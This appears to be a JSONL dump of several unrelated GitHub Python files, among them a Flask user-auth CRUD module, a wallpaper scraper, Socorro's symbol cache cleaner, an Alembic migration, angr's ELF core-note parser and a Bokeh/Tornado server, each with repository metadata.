models.route_model import UpdateProfile, UserCreate, UserLogin\nimport bcrypt\n\nfrom sqlalchemy import or_\nfrom sqlalchemy.exc import IntegrityError\nfrom sqlalchemy import asc, desc \nimport logging\n\nimport jwt\n\nimport os\nfrom dotenv import load_dotenv\nload_dotenv()\n\nfrom models.db_model import User\n\n\n# eaxmple of register new user\ndef register(userData: UserCreate, role: str = \"users\"):\n session = SessionLocal()\n try:\n hashed_password = bcrypt.hashpw(userData.password.encode('utf-8'), bcrypt.gensalt()).decode('utf-8')\n\n user = User(fullname=userData.fullname, \n username=userData.username, \n password=hashed_password, \n email=userData.email, \n mobile=userData.mobile, \n role=role,\n agree=1)\n session.add(user)\n session.commit()\n return True, user.id\n except IntegrityError as e:\n # Handle the IntegrityError here\n session.rollback()\n logging.error(f\"Integrity Error: {e}\")\n return False, 'Duplicate username'\n except Exception as e:\n session.rollback()\n logging.error(f\"Exception: {e}\")\n return False, 'Insertion failed'\n\n# example of login user and create login token\ndef login(user: UserLogin):\n session = SessionLocal()\n\n user_record = session.query(User).filter((User.username == user.username) & (User.agree == 1)).first()\n if user_record is not None and bcrypt.checkpw(user.password.encode('utf-8'), user_record.password.encode('utf-8')):\n uDict = user_record.__dict__\n del uDict['password']\n del uDict['_sa_instance_state']\n\n token = jwt.encode({'public_id' : str(uDict['id']), 'exp' : datetime.utcnow() + timedelta(minutes=1440)}, os.getenv('APP_SECRET_KEY'), algorithm=\"HS256\")\n if token is not None:\n uDict['login_token'] = token.decode('utf-8')\n uDict['login_token_date'] = datetime.utcnow()\n res = update_token(uDict['id'], uDict['login_token'], uDict['login_token_date'])\n if res > 0:\n return uDict\n \n return None\n else:\n return None\n \n# example of read user data by user id\ndef getUser(user_id: int):\n try:\n session = SessionLocal()\n\n user_record = session.query(User).filter(User.id == user_id).first()\n uDict = user_record.__dict__\n del uDict['password']\n if 'login_token' in uDict:\n del uDict['login_token']\n if 'login_token_date' in uDict:\n del uDict['login_token_date']\n del uDict['_sa_instance_state']\n return uDict\n except Exception as e:\n logging.error(f\"Exception: {e}\")\n return None\n\n\n# example of read user data by user id and role\ndef validate_user(id: int, role: str = \"users\"):\n try:\n session = SessionLocal()\n\n user_record = session.query(User).filter((User.id == id) & (User.role == role) & (User.agree == 1)).first()\n # add required logic to validate user\n return user_record is not None\n except Exception as e:\n logging.error(f\"Exception: {e}\")\n return False\n\n# function to validate user token\ndef validateUserToken(user_id: int, token: str):\n\n session = SessionLocal()\n user_record = session.query(User).filter(User.id == user_id).first()\n \n if user_record is None:\n return False\n \n if user_record.login_token != token:\n return False\n \n current_time = datetime.utcnow()\n time_difference = current_time - user_record.login_token_date\n\n if time_difference < timedelta(minutes=1440):\n return True\n \n return False\n\n# function to update user login token\ndef update_token(user_id: int, token: str, login_token_date: datetime):\n session = SessionLocal()\n try:\n user_record = session.query(User).filter(User.id == user_id).first()\n if user_record:\n user_record.login_token=token\n user_record.login_token_date=login_token_date\n session.commit()\n return True\n except Exception as e:\n session.rollback()\n logging.error(f\"Exception: {e}\")\n return False\n\n# example of update user details\ndef update_details(userData: UpdateProfile):\n session = SessionLocal()\n try:\n user_record = session.query(User).filter(User.id == userData.profile_id).first()\n if user_record:\n user_record.fullname=userData.fullname, \n user_record.mobile=userData.mobile, \n user_record.agree=userData.status\n session.commit()\n return True, 'User record updated'\n except Exception as e:\n session.rollback()\n logging.error(f\"Exception: {e}\")\n return False, 'User record update failed'\n\n# example of list all users with pagination\ndef list_users(role: str, status=\"all\", offset: int = 0, limit: int = 10, order_by: str = None, order_direction: str = None, search_term: str = None):\n session = SessionLocal()\n\n p_res = session.query(User)\n\n if status is not None and status== \"activated\":\n p_res = p_res.filter(User.agree == 1)\n elif status is not None and status== \"deactivated\":\n p_res = p_res.filter(User.agree == 0)\n\n if role is not None and role!= \"all\":\n p_res = p_res.filter(User.role == role)\n\n if search_term:\n like_filter = or_(User.fullname.like(f'%{search_term}%'), User.username.like(f'%{search_term}%'), User.email.like(f'%{search_term}%'), User.mobile.like(f'%{search_term}%'))\n p_res = p_res.filter(like_filter)\n\n total_count = p_res.count()\n\n if order_direction == 'asc':\n p_res = p_res.order_by(asc(order_by))\n else:\n p_res = p_res.order_by(desc(order_by))\n\n p_res = p_res.offset(offset).limit(limit)\n p_res = p_res.all()\n return total_count, [{\"id\": usr.id, \"fullname\": usr.fullname, \"username\": usr.username, \"email\": usr.email, \"mobile\": usr.mobile, \"created_date\": usr.created, \"agree\": usr.agree} for usr in p_res]\n","repo_name":"ntshvicky/Flask-SQLAlchemy-MVC","sub_path":"cruds/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":6165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"36459598047","text":"import sys\nfrom month import Month\nfrom datetime import datetime\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nimport concurrent.futures\nfrom selenium import webdriver\nimport requests\nimport re\nimport os\nimport shutil\n\n\ndef RepresentsInt(s):\n try: \n int(s)\n return True\n except ValueError:\n return False\n\n\ndef get_user_input():\n check_user_input(sys.argv[1:])\n return list([int(arg) for arg in sys.argv[1:]]) \n\n\ndef check_user_input(arg):\n current_year = datetime.today().year\n year_list = list(range(current_year,current_year - 22, -1))\n if not arg:\n print(\"Не ввели параметры :(\")\n exit(1)\n elif len(arg) != 2:\n print(\"Не ввели нужное(2) количество параметров :(\")\n exit(1)\n else:\n month, year = list(arg)\n if RepresentsInt(month) and RepresentsInt(year): \n if int(month) in list(map(int, Month)) and int(year) in year_list:\n print(\"Аргументы валидны :)\")\n else:\n print(\"Поменяйте аргументы местами либо сделайте их меньше :(\")\n exit(1)\n else:\n print(\"Ввели не числовой формат :(\")\n exit(1)\n\n\ndef get_urls():\n urls = []\n page = 1\n while True:\n url = f\"https://www.smashingmagazine.com/category/wallpapers/page/{page}/\"\n req = requests.get(url)\n soup = BeautifulSoup(req.text, 'html.parser')\n if soup.find('h2'):\n if soup.find('h2').text == \"Uh-Oh, We Lost Your Page! (404) \":\n return urls\n urls.append(url)\n page+=1\n\n\ndef send_req(url):\n op = webdriver.ChromeOptions()\n op.add_argument('headless')\n driver = webdriver.Chrome(ChromeDriverManager().install(),options=op)\n driver.get(url)\n soup = BeautifulSoup(driver.page_source, 'html.parser')\n driver.quit()\n return soup\n\n\ndef get_pages(urls):\n pages = []\n with concurrent.futures.ThreadPoolExecutor() as executor:\n futures = []\n for url in urls:\n futures.append(executor.submit(send_req, url))\n for future in concurrent.futures.as_completed(futures):\n pages.append(future.result())\n return pages\n\n\ndef get_date_urls_from_pages(pages):\n urls = { \"data\":[]}\n\n\n def add_url(url):\n urls[\"data\"].append(url)\n \n \n for page in pages:\n tag_inside = [tag for tag in page.find_all(\"h1\",class_='article--post__title')]\n for tag in tag_inside:\n month_year = tag.find('a').get('href').split(\"-\")\n key = \"-\".join(month_year[-2:]).replace('/', '')\n url = {}\n url[key] = \"https://www.smashingmagazine.com\"+tag.find('a').get('href')\n add_url(url)\n only_date_urls = []\n i = 0\n for item in urls['data']:\n for key in item.keys():\n if any(char.isdigit() for char in key):\n only_date_urls.append(urls['data'][i])\n i+=1\n return only_date_urls\n\n\ndef match_url(date_urls, user_date):\n i=0\n for item in date_urls:\n for date in item.keys():\n if date == user_date:\n print(date_urls[i][date] )\n return date_urls[i][date] \n i+=1\n\n\ndef get_imgs_urls(url):\n if url == None:\n print(\"Нету картинок на эту дату :(\")\n exit(1)\n else:\n soup = send_req(url)\n links = [a['href'] for a in soup.find_all('a', href=re.compile('wallpapers'))]\n return links\n\n\ndef get_month_name(month_num):\n for month in Month:\n if month.value == month_num:\n return month.name\n\n\ndef create_directory(dir_name):\n directory = f\"{os.path.dirname(os.path.realpath(__file__))}\\{dir_name}\"\n if not os.path.isdir(directory):\n os.makedirs(dir_name)\n return directory\n else:\n shutil.rmtree(dir_name)\n os.makedirs(dir_name)\n return directory\n \n\n\ndef extract_single_image(img, dir_path):\n file_name = img.split('/')[-1]\n path = f\"{dir_path}/{file_name}\"\n print(path)\n try:\n r = requests.get(img, stream=True)\n if r.status_code == 200:\n with open(path, 'wb') as f:\n for chunk in r:\n f.write(chunk)\n return \"Completed\"\n except Exception as e:\n return \"Failed\"\n\n\ndef download_imgs(images_urls, dir_path):\n with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:\n future_to_url = {executor.submit(extract_single_image, image_url, dir_path) for image_url in images_urls}\n for future in concurrent.futures.as_completed(future_to_url):\n try:\n url = future_to_url[future]\n except Exception as e:\n pass\n try:\n data = future.result()\n print(data)\n except Exception as exc:\n print('%r generated an exception: %s' % (url, exc))\n\n\nif __name__ == \"__main__\":\n urls = get_urls()\n pages = get_pages(urls)\n date_urls = get_date_urls_from_pages(pages)\n month, year = get_user_input()\n user_url = match_url(date_urls, f\"{get_month_name(month)}-{year}\")\n imgs_urls = get_imgs_urls(user_url)\n dir_path = create_directory(f\"{get_month_name(month)}-{year}\")\n download_imgs(imgs_urls, dir_path)\n \n \n\n","repo_name":"VictorSkazetski/cli_test_app","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":5518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"22519006604","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n\nimport os\nimport sys\nimport tempfile\nfrom ordereddict import OrderedDict\n\nfrom configman import Namespace, RequiredConfig\n\n\nif os.uname()[0] != 'Linux':\n # You're not on Linux! Avoid pyinotify like the plague\n\n warning_message = (\n 'SymbolLRUCache is disabled on operating systems that does not '\n 'have inotify in its kernel.'\n )\n\n class ProcessEvent(object):\n # Defining a class means we can't define the EventHandler class\n # without indenting the whole thing in an if-block.\n def __init__(self, *_, **__):\n # Re-use the warning as a the error message in case someone\n # missing the warning and don't understand why it's not\n # working on their Windows or OSX.\n raise NotImplementedError(warning_message)\n\n # Warn about the fact that SymbolLRUCache is going to be borked\n # just by trying to import this.\n import warnings\n warnings.warn(warning_message)\nelse:\n import pyinotify\n from pyinotify import ProcessEvent\n\n\n# =============================================================================\nclass EventHandler(ProcessEvent):\n # -------------------------------------------------------------------------\n def __init__(self, monitor, verbosity=0):\n pyinotify.ProcessEvent.__init__(self)\n self.monitor = monitor\n self.verbosity = verbosity\n\n # -------------------------------------------------------------------------\n def process_IN_DELETE(self, event):\n if not event.dir:\n if self.verbosity == 1:\n sys.stdout.write('D')\n sys.stdout.flush()\n elif self.verbosity == 2:\n self.monitor.config.logger.debug('D %s', event.pathname)\n self.monitor._remove_cached(event.pathname)\n\n # -------------------------------------------------------------------------\n def process_IN_CREATE(self, event):\n if not event.dir:\n if self.verbosity == 1:\n sys.stdout.write('C')\n sys.stdout.flush()\n elif self.verbosity == 2:\n self.monitor.config.logger.debug('C %s', event.pathname)\n self.monitor._update_cache(event.pathname)\n\n # -------------------------------------------------------------------------\n def process_IN_MOVED_FROM(self, event):\n if not event.dir:\n if self.verbosity == 1:\n sys.stdout.write('M')\n sys.stdout.flush()\n elif self.verbosity == 2:\n self.monitor.config.logger.debug('M> %s', event.pathname)\n self.monitor._remove_cached(event.pathname)\n\n # -------------------------------------------------------------------------\n def process_IN_MOVED_TO(self, event):\n if not event.dir:\n if self.verbosity == 1:\n sys.stdout.write('M')\n sys.stdout.flush()\n elif self.verbosity == 2:\n self.monitor.config.logger.debug('M< %s', event.pathname)\n self.monitor._update_cache(event.pathname)\n\n # -------------------------------------------------------------------------\n def process_IN_OPEN(self, event):\n if not event.dir:\n if self.verbosity == 1:\n sys.stdout.write('O')\n sys.stdout.flush()\n elif self.verbosity == 2:\n self.monitor.config.logger.debug('O %s', event.pathname)\n self.monitor._update_cache(event.pathname)\n\n # -------------------------------------------------------------------------\n def process_IN_MODIFY(self, event):\n if not event.dir:\n if self.verbosity == 1:\n sys.stdout.write('M')\n sys.stdout.flush()\n elif self.verbosity == 2:\n self.monitor.config.logger.debug('M %s', event.pathname)\n self.monitor._update_cache(event.pathname, update_size=True)\n\n\n# -----------------------------------------------------------------------------\ndef from_string_to_parse_size(size_as_string):\n '''\n Parse a size argument of the form \\d+[kMG] that represents a size in\n bytes, with the suffixes representing kilobytes, megabytes or gigabytes\n respectively.\n '''\n suffixes = {\n 'k': 1024,\n 'M': 1024 ** 2,\n 'G': 1024 ** 3,\n }\n if not isinstance(size_as_string, basestring) or not size_as_string:\n raise ValueError('Bad size value: \"%s\"' % size_as_string)\n\n if size_as_string[-1].isdigit():\n return int(size_as_string)\n\n if size_as_string[-1] not in suffixes:\n raise ValueError('Unknown size suffix: \"%s\"' % size_as_string[-1])\n\n return int(size_as_string[:-1]) * suffixes[size_as_string[-1]]\n\n\n# =============================================================================\nclass SymbolLRUCacheManager(RequiredConfig):\n \"\"\"for cleaning up the symbols cache\"\"\"\n required_config = Namespace()\n required_config.add_option(\n 'symbol_cache_path',\n doc=\"the cache directory to automatically remove files from\",\n default=os.path.join(tempfile.gettempdir(), 'symbols')\n )\n required_config.add_option(\n 'symbol_cache_size',\n doc=\"the maximum size of the symbols cache\",\n default='1G',\n from_string_converter=from_string_to_parse_size\n )\n required_config.add_option(\n 'verbosity',\n doc=\"how chatty should this be? 1 - writes to stdout,\"\n \" 2 - uses the logger\",\n default=0,\n from_string_converter=int\n )\n\n # -------------------------------------------------------------------------\n def __init__(self, config, quit_check_callback=None):\n \"\"\"constructor for a registration object that runs an LRU cache\n cleaner\"\"\"\n self.config = config\n\n self.directory = os.path.abspath(config.symbol_cache_path)\n self.max_size = config.symbol_cache_size\n self.verbosity = config.verbosity\n # Cache state\n self.total_size = 0\n self._lru = OrderedDict()\n # pyinotify bits\n self._wm = pyinotify.WatchManager()\n self._handler = EventHandler(self, verbosity=config.verbosity)\n self._notifier = pyinotify.ThreadedNotifier(self._wm, self._handler)\n mask = pyinotify.IN_DELETE | pyinotify.IN_CREATE \\\n | pyinotify.IN_OPEN | pyinotify.IN_MOVED_FROM \\\n | pyinotify.IN_MOVED_TO | pyinotify.IN_MODIFY\n self._wdd = self._wm.add_watch(\n self.directory,\n mask,\n rec=True,\n auto_add=True\n )\n # Load existing files into the cache.\n self._get_existing_files(self.directory)\n self._notifier.start()\n\n # -------------------------------------------------------------------------\n @property\n def num_files(self):\n return len(self._lru)\n\n # -------------------------------------------------------------------------\n def _rm_empty_dirs(self, path):\n '''\n Attempt to remove any empty directories that are parents of path\n and children of self.directory.\n '''\n path = os.path.dirname(path)\n while not os.path.samefile(path, self.directory):\n if not os.listdir(path):\n os.rmdir(path)\n path = os.path.dirname(path)\n\n # -------------------------------------------------------------------------\n def _update_cache(self, path, update_size=False):\n if path in self._lru:\n size = self._lru.pop(path)\n if update_size:\n self.total_size -= size\n else:\n update_size = True\n\n if update_size:\n try:\n size = os.stat(path).st_size\n except OSError:\n self.config.logger.warning(\n 'file was not found while cleaning cache: %s', path\n )\n return\n\n self.total_size += size\n # If we're out of space, remove items from the cache until\n # we fit again.\n while self.total_size > self.max_size and self._lru:\n rm_path, rm_size = self._lru.popitem(last=False)\n self.total_size -= rm_size\n os.unlink(rm_path)\n self._rm_empty_dirs(rm_path)\n if self.verbosity >= 2:\n self.config.logger.debug('RM %s', rm_path)\n self._lru[path] = size\n\n # -------------------------------------------------------------------------\n def _remove_cached(self, path):\n # We might have already removed this file in _update_cache.\n if path in self._lru:\n size = self._lru.pop(path)\n self.total_size -= size\n\n # -------------------------------------------------------------------------\n def _get_existing_files(self, path):\n for base, dirs, files in os.walk(path):\n for f in files:\n f = os.path.join(base, f)\n self._update_cache(f)\n\n # -------------------------------------------------------------------------\n def close(self):\n self._notifier.stop()\n\n\n# =============================================================================\nclass NoOpCacheManager(RequiredConfig):\n def __init__(self, *args, **kwargs):\n pass\n","repo_name":"lienduo/OSS","sub_path":"CrashDump/socorro-master/socorro/processor/symbol_cache_manager.py","file_name":"symbol_cache_manager.py","file_ext":"py","file_size_in_byte":9511,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"92"} +{"seq_id":"2973523177","text":"import uuid\n\nfrom repositories.template.mongoRepository import MongoRepository\n\nrepo = MongoRepository(\"products\")\n\n\nclass Product:\n def __init__(self, data):\n self.data = data\n\n @staticmethod\n def get(product_id):\n product_data = repo.read({\"product_id\": product_id})\n\n if not product_data:\n return None\n else:\n return Product(product_data)\n\n @staticmethod\n def create(data):\n if not Product.check_data(data):\n raise Exception(\"Bad data\")\n repo.insert(data)\n return Product(data)\n\n @staticmethod\n def check_data(data):\n return \"name\" in data and \"product_id\" in data\n\n\nproduct = {\n \"tag_id\": uuid.uuid4(),\n \"name\": \"test name\",\n \"purchase_date\": \"test_date\",\n \"picture\": \"test_pic\"\n}\n","repo_name":"hanasmarcin/NFC-gift","sub_path":"repositories/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"16441769367","text":"\"\"\"create note, notebook, tag and relationships\n\nRevision ID: 202c1cd09f8c\nRevises: 0549af0e798c\nCreate Date: 2020-09-10 15:53:59.795159\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '202c1cd09f8c'\ndown_revision = '0549af0e798c'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('tags',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=50), nullable=False),\n sa.Column('created_at', sa.DateTime(), nullable=True),\n sa.Column('updated_at', sa.DateTime(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('notebooks',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=False),\n sa.Column('title', sa.String(length=50), nullable=False),\n sa.Column('shortcut', sa.Boolean(), nullable=False),\n sa.Column('created_at', sa.DateTime(), nullable=True),\n sa.Column('updated_at', sa.DateTime(), nullable=True),\n sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('notes',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('owner_id', sa.Integer(), nullable=False),\n sa.Column('notebook_id', sa.Integer(), nullable=False),\n sa.Column('title', sa.String(length=50), nullable=True),\n sa.Column('content', sa.Text(), nullable=True),\n sa.Column('shortcut', sa.Boolean(), nullable=False),\n sa.Column('created_at', sa.DateTime(), nullable=True),\n sa.Column('updated_at', sa.DateTime(), nullable=True),\n sa.ForeignKeyConstraint(['notebook_id'], ['notebooks.id'], ),\n sa.ForeignKeyConstraint(['owner_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('note_tags',\n sa.Column('note_id', sa.Integer(), nullable=False),\n sa.Column('tag_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['note_id'], ['notes.id'], ),\n sa.ForeignKeyConstraint(['tag_id'], ['tags.id'], ),\n sa.PrimaryKeyConstraint('note_id', 'tag_id')\n )\n op.create_table('user_shared_notes',\n sa.Column('shared_id', sa.Integer(), nullable=False),\n sa.Column('note_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['note_id'], ['notes.id'], ),\n sa.ForeignKeyConstraint(['shared_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('shared_id', 'note_id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('user_shared_notes')\n op.drop_table('note_tags')\n op.drop_table('notes')\n op.drop_table('notebooks')\n op.drop_table('tags')\n # ### end Alembic commands ###\n","repo_name":"Greg001100/Makimono","sub_path":"migrations/versions/20200910_155359_create_note_notebook_tag_and_.py","file_name":"20200910_155359_create_note_notebook_tag_and_.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"26391474113","text":"import struct\nimport elftools\nimport logging\n\nfrom .elf import ELF\nfrom .. import register_backend\nfrom ...errors import CLEError, CLECompatibilityError\n\nl = logging.getLogger('cle.elfcore')\n\n\nclass CoreNote(object):\n \"\"\"\n This class is used when parsing the NOTES section of a core file.\n \"\"\"\n n_type_lookup = {\n 1: 'NT_PRSTATUS',\n 2: 'NT_PRFPREG',\n 3: 'NT_PRPSINFO',\n 4: 'NT_TASKSTRUCT',\n 6: 'NT_AUXV',\n 0x53494749: 'NT_SIGINFO',\n 0x46494c45: 'NT_FILE',\n 0x46e62b7f: 'NT_PRXFPREG'\n }\n\n def __init__(self, n_type, name, desc):\n self.n_type = n_type\n if n_type in CoreNote.n_type_lookup:\n self.n_type = CoreNote.n_type_lookup[n_type]\n self.name = name\n self.desc = desc\n\n def __repr__(self):\n return \"<Note %s %s %#x>\" % (self.name, self.n_type, len(self.desc))\n\n\nclass ELFCore(ELF):\n \"\"\"\n Loader class for ELF core files.\n \"\"\"\n is_default = True # Tell CLE to automatically consider using the ELFCore backend\n\n def __init__(self, binary, **kwargs):\n super(ELFCore, self).__init__(binary, **kwargs)\n\n self.notes = [ ]\n\n # siginfo\n self.si_signo = None\n self.si_code = None\n self.si_errno = None\n\n # prstatus\n self.pr_cursig = None\n self.pr_sigpend = None\n self.pr_sighold = None\n\n self.pr_pid = None\n self.pr_ppid = None\n self.pr_pgrp = None\n self.pr_sid = None\n\n self.pr_utime_usec = None\n self.pr_stime_usec = None\n self.pr_cutime_usec = None\n self.pr_cstime_usec = None\n\n self.registers = None\n\n self.pr_fpvalid = None\n\n self.__extract_note_info()\n\n if not self.pr_fpvalid is None and (self.arch.name == 'X86' or self.arch.name == 'AMD64'):\n if not bool(self.pr_fpvalid):\n l.warning(\"No SSE registers could be loaded from core file\")\n\n @staticmethod\n def is_compatible(stream):\n stream.seek(0)\n identstring = stream.read(0x1000)\n stream.seek(0)\n if identstring.startswith('\\x7fELF'):\n if elftools.elf.elffile.ELFFile(stream).header['e_type'] == 'ET_CORE':\n return True\n return False\n return False\n\n def initial_register_values(self):\n return self.registers.iteritems()\n\n def __extract_note_info(self):\n \"\"\"\n All meaningful information about the process's state at crashtime is stored in the note segment.\n \"\"\"\n for seg_readelf in self.reader.iter_segments():\n if seg_readelf.header.p_type == 'PT_NOTE':\n self.__parse_notes(seg_readelf)\n break\n else:\n l.warning(\"Could not find note segment, cannot initialize registers\")\n\n def __parse_notes(self, seg):\n \"\"\"\n This exists, because note parsing in elftools is not good.\n \"\"\"\n\n blob = seg.data()\n\n note_pos = 0\n while note_pos < len(blob):\n name_sz, desc_sz, n_type = struct.unpack(\"<3I\", blob[note_pos:note_pos+12])\n name_sz_rounded = (((name_sz + (4 - 1)) / 4) * 4)\n desc_sz_rounded = (((desc_sz + (4 - 1)) / 4) * 4)\n # description size + the rounded name size + header size\n n_size = desc_sz_rounded + name_sz_rounded + 12\n\n # name_sz includes the null byte\n name = blob[note_pos+12:note_pos+12+name_sz-1]\n desc = blob[note_pos+12+name_sz_rounded:note_pos+12+name_sz_rounded+desc_sz]\n\n self.notes.append(CoreNote(n_type, name, desc))\n note_pos += n_size\n\n # prstatus\n prstatus = filter(lambda x: x.n_type == 'NT_PRSTATUS', self.notes)\n if len(prstatus) > 1:\n raise CLEError(\"Multiple occurences of NT_PRSTATUS notes in core file\")\n prstatus = prstatus[0]\n\n self.__parse_prstatus(prstatus)\n\n def __parse_prstatus(self, prstatus):\n \"\"\"\n Parse out the prstatus, accumulating the general purpose register values. Supports AMD64, X86, ARM, and AARCH64\n at the moment.\n\n :param prstatus: a note object of type NT_PRSTATUS.\n \"\"\"\n\n # TODO: support all architectures angr supports\n\n # extract siginfo from prstatus\n self.si_signo, self.si_code, self.si_errno = struct.unpack(\"<3I\", prstatus.desc[:12])\n\n # this field is a short, but it's padded to an int\n self.pr_cursig = struct.unpack(\"<I\", prstatus.desc[12:16])[0]\n\n arch_bytes = self.arch.bits / 8\n if arch_bytes == 4:\n fmt = \"I\"\n elif arch_bytes == 8:\n fmt = \"Q\"\n else:\n raise CLEError(\"Architecture must have a bitwidth of either 64 or 32\")\n\n self.pr_sigpend, self.pr_sighold = struct.unpack(\"<\" + (fmt * 2), prstatus.desc[16:16+(2*arch_bytes)])\n\n attrs = struct.unpack(\"<IIII\", prstatus.desc[16+(2*arch_bytes):16+(2*arch_bytes)+(4*4)])\n self.pr_pid, self.pr_ppid, self.pr_pgrp, self.pr_sid = attrs\n\n # parse out the 4 timevals\n pos = 16+(2*arch_bytes)+(4*4)\n usec = struct.unpack(\"<\" + fmt, prstatus.desc[pos:pos+arch_bytes])[0] * 1000\n self.pr_utime_usec = struct.unpack(\"<\" + fmt, prstatus.desc[pos+arch_bytes:pos+arch_bytes*2])[0] + usec\n\n pos += arch_bytes * 2\n usec = struct.unpack(\"<\" + fmt, prstatus.desc[pos:pos+arch_bytes])[0] * 1000\n self.pr_stime_usec = struct.unpack(\"<\" + fmt, prstatus.desc[pos+arch_bytes:pos+arch_bytes*2])[0] + usec\n\n pos += arch_bytes * 2\n usec = struct.unpack(\"<\" + fmt, prstatus.desc[pos:pos+arch_bytes])[0] * 1000\n self.pr_cutime_usec = struct.unpack(\"<\" + fmt, prstatus.desc[pos+arch_bytes:pos+arch_bytes*2])[0] + usec\n\n pos += arch_bytes * 2\n usec = struct.unpack(\"<\" + fmt, prstatus.desc[pos:pos+arch_bytes])[0] * 1000\n self.pr_cstime_usec = struct.unpack(\"<\" + fmt, prstatus.desc[pos+arch_bytes:pos+arch_bytes*2])[0] + usec\n\n pos += arch_bytes * 2\n\n # parse out general purpose registers\n if self.arch.name == 'AMD64':\n # register names as they appear in dump\n rnames = ['r15', 'r14', 'r13', 'r12', 'rbp', 'rbx', 'r11', 'r10', 'r9', 'r8', 'rax', 'rcx', \\\n 'rdx', 'rsi', 'rdi', 'xxx', 'rip', 'cs', 'eflags', 'rsp', 'ss', 'xxx', 'xxx', 'ds', 'es', \\\n 'fs', 'gs']\n nreg = 27\n elif self.arch.name == 'X86':\n rnames = ['ebx', 'ecx', 'edx', 'esi', 'edi', 'ebp', 'eax', 'ds', 'es', 'fs', 'gs', 'xxx', 'eip', \\\n 'cs', 'eflags', 'esp', 'ss']\n nreg = 17\n elif self.arch.name == 'ARMHF' or self.arch.name == 'ARMEL':\n rnames = ['r0', 'r1', 'r2', 'r3', 'r4', 'r5', 'r6', 'r7', 'r8', 'r9', 'r10', 'r11', 'r12', 'r13', \\\n 'r14', 'r15', 'xxx', 'xxx']\n nreg = 18\n elif self.arch.name == 'AARCH64':\n rnames = ['x%d' % i for i in range(32)]\n rnames.append('pc')\n rnames.append('xxx')\n nreg = 34\n elif self.arch.name == 'MIPS32':\n rnames = ['xxx', 'xxx', 'xxx', 'xxx', 'xxx', 'xxx', \\\n 'zero', 'at', 'v0', 'v1', 'a0', 'a1', 'a2', 'a3', \\\n 't0', 't1', 't2', 't3', 't4', 't5', 't6', 't7', \\\n 's0', 's1', 's2', 's3', 's4', 's5', 's6', 's7', \\\n 't8', 't9', 'k0', 'k1', 'gp', 'sp', 's8', 'ra', \\\n 'lo', 'hi', 'pc', 'bad', 'sr', 'status', 'cuase']\n nreg = 45\n else:\n raise CLECompatibilityError(\"Architecture '%s' unsupported by ELFCore\" % self.arch.name)\n\n regvals = [ ]\n for idx in range(pos, pos+nreg*arch_bytes, arch_bytes):\n regvals.append(struct.unpack(\"<\" + fmt, prstatus.desc[idx:idx+arch_bytes])[0])\n self.registers = dict(zip(rnames, regvals))\n del self.registers['xxx']\n\n pos += nreg * arch_bytes\n self.pr_fpvalid = struct.unpack(\"<I\", prstatus.desc[pos:pos+4])[0]\n\nregister_backend('elfcore', ELFCore)\n","repo_name":"another1024/angr-analysis","sub_path":"源码注释分析/cle/backends/elf/elfcore.py","file_name":"elfcore.py","file_ext":"py","file_size_in_byte":8148,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"92"} +{"seq_id":"26888311731","text":"#!/usr/bin/env python\nimport os\nimport tornado.web\nimport jinja2\nfrom bokeh.server.server import Server\nimport bar.main\n\n\nenv = jinja2.Environment(loader=jinja2.FileSystemLoader(\".\"))\n\n\nclass Index(tornado.web.RequestHandler):\n def get(self):\n template = env.get_template(\"index.html\")\n self.write(template.render(message=\"Hello, world!\"))\n\n\ndef bokeh_server():\n extra_patterns = [\n ('/', Index),\n (r\"/_static/(.*)\", tornado.web.StaticFileHandler, {\"path\": \"./_static\"}),\n (r\"/bar/static/(.*)\", tornado.web.StaticFileHandler, {\"path\": \"./bar/static\"})\n ]\n return Server({\"/bkapp\": bar.main.app}, extra_patterns=extra_patterns)\n\n\nif __name__ == '__main__':\n print(\"starting bokeh server\")\n server = bokeh_server()\n server.io_loop.start()\n","repo_name":"andrewgryan/bokeh-playground","sub_path":"tornado/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"92"} +{"seq_id":"71436426861","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"SiStrpDQMLive\")\n\nprocess.MessageLogger = cms.Service(\"MessageLogger\",\n debugModules = cms.untracked.vstring('siStripDigis', \n 'siStripClusters', \n 'siStripZeroSuppression', \n 'SiStripClusterizer'),\n cout = cms.untracked.PSet(threshold = cms.untracked.string('ERROR')),\n destinations = cms.untracked.vstring('cout')\n)\n\n#----------------------------\n# Event 